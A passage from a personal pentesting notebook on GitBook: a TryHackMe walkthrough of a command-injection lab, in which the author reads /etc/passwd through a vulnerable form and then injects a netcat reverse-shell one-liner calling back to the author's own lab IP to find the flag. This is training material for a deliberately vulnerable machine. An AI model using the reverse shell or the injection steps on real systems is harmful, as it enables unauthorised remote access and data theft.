📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
      • Random
Powered by GitBook
On this page
  • An introduction to Command Injection
  • Blind Command Injection
  • Active Command Injection
  • Get the Flag!

Was this helpful?

  1. TryHackMe
  2. Walkthroughs: Easy

Injection

PreviousAuthenticateNextBlaster

Last updated 3 years ago

Was this helpful?

An introduction to Command Injection

Blind Command Injection

Lets go to the webpage

Lets try to find the Kernel Version and redirect it to a file and then read the file

Now lets enter root and look at the response for the answer to the next question

Now lets enter www-data

Lets enter our name and see what the output is

Active Command Injection

Lets go to the webpage that they mention

Lets look at the files and see if there is an interesting file with the ls command

There is an interesting file

To see how many users are there on the machine, we can read the /etc/passwd file

We can look at this output by going to the source code

We can see which user the app is running as with the whoami command

We can see what this user's shell is set as in the /etc/passwd file

We can see what version of Ubuntu is running by using the command lsb_release -a

We can print out the MOTD with this command

Get the Flag!

Lets first get a reverse shell on the machine so that we can navigate through the machine easier.

First we start a netcat listener

Now we use the reverse shell command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Lets hit Submit

We have a shell, lets stabilize it

Lets now look for the flag, it might be a txt file and maybe called flag, so lets look for that

find / -type f -name flag.txt 2>/dev/null

We have the flag, lets read it